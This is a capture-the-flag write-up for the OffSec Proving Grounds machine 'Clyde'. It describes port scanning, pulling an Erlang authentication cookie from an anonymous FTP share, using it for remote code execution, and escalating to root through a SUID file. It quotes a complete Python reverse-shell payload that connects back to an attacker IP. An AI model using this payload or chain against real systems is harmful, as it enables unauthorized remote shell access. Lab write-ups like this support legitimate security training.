Clyde
Writeup for Clyde from offsec Proving Grounds
Last updated
Was this helpful?
Writeup for Clyde from offsec Proving Grounds
Last updated
Was this helpful?
sudo ./nmapAutomator.sh 192.168.141.68 all
Doesn't look like there's much here, but we run gobuster either ways to see if we find anything interesting.
Hmmm...seems like a dead-end, lets see what else we can find on other ports.
The erlang port mapper daemon is used to coordinate distributed erlang instances which keeps track of which node name listens on which address.
A quick google search and we find out that if we are able to find the authentication cookie on this machine, we can get RCE. Let's note down the cookie name to be .erlang.cookie
We try to log in using the default credentials guest:guest but are unsuccessful.
Since anonymous login is allowed, we can see what files are available here. We immediately notice the rabitmqdirectory which is the CMS running on port 15672.
When we enter this directory and list its contents, we see that there is the file .erlang.cookie which can be used to gain RCE through Erlang Port Mapper Daemon Exploit.
We download .erlang.cookie to our attack machine.
First, we make changes in the script on lines 22-24 to specify the target and cookie value. We can then change the CMD variable to any command we want.
We first check if there is python on this target so we can use python to get our reverse shell.
Seem like there's python so we can use python to get our reverse shell. Note that we have to use the escape character as there are many quotation marks used.
Payload: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.141",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"
Running LinEnum on the target, we notice an interesting SUID file.
And we got root!
